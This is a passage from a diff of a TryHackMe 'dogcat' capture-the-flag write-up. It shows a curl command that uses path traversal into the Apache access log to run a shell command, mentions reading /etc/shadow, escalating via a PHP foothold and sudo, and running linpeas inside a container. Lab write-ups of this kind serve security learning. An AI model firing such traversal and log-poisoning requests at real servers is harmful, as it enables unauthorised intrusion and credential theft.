montysecurity/literature/writeups/tryhackme/dogcat/README.md

 └──╼ $curl -s 'http://10.10.252.138/?view=cat/../../../../../../../../../..//var/log/apache2/access&ext=.log&c=uname%20-a' | grep "07/Mar/2021:03:00:55" | sed 's/.*http:\/\/10.10.42.190\/\" \"//g' | sed 's/Wed.*//g'
 ```

-so that passwd cron does not seem to be viable, I have access to all files involved and can jst cat /etc/shadow, which does not provide anything useful
+so that passwd cron does not seem to be viable, I have access to all files involved and can just cat /etc/shadow, which does not provide anything useful

+*re-stablished foothold with php file - technique described above*
+*escalated to root with sudo - technique described above*

 ### privesc to root (on host OS)

 ran linpeas from /root/ in container as root

 ```
 [+] Modified interesting files in the last 5mins (limit 100)